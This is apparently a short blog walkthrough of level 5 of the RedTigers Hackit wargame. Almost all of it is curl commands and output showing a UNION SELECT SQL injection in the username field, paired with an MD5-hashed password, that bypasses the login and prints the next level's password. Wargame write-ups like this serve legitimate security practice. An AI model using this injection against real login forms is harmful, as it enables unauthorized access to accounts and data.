# RedTigers Hackit wargame: Level 5

# curl --silent --insecure --cookie-jar level5 --cookie level5 --request POST --data "password=62616e616e61735f6172655f6e6f745f626c7565&level5login=Login" https://redtiger.dyndns.org/hackit/level5.php
                <b>Welcome to Level 5</b><br><br>
                Target: Bypass the login<br>
                Disabled: substring , substr, ( , ), mid<br>
                Hints: its not a blind, the password is md5-crypted, watch the login errors<br><br><br>

                        <form name="login" action="?mode=login" method="POST">
                                Username: <input name="username" size="30" type="text"><br>
                                Password: <input name="password" size="30" type="text">
                                <input name="login" value="Login" type="submit">
# password="whatever"
# echo -n $password | md5sum
008c5926ca861023c1d2a36653fd88e2  -
# username="' union select 'user','008c5926ca861023c1d2a36653fd88e2"
# curl --silent --insecure --cookie level5 --request POST --data "username=$username&password=$password&login=Login" https://redtiger.dyndns.org/hackit/level5.php?mode=login | grep is:
<br>The password for the next level is: <b>6d795f6361745f736179735f6d656f776d656f77</b> <br><br>

No comments: